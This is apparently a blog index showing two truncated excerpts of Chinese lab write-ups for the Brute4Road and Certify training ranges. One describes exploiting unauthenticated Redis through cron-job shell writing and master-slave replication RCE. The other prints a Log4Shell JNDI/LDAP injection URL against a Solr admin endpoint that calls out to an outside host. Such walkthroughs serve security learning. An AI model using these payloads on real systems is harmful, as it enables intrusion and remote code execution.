春秋云镜-Brute4Road

flag01fscan: 发现有Redis未授权,尝试写计划任务弹shell,但是权限不够。 可以打主从复制,服务端上部署恶意Redis服务:[[<=5.0.5) RCE (github.com)](https://github.co...

打靶记录

春秋云镜-Certify

外网打点fscan扫一下: 有一个solr页面,而且有Log4j Log4Shell验证成功: 1http://39.99.159.154:8983/solr/admin/cores?action=${jndi:ldap://i8nw97....

打靶记录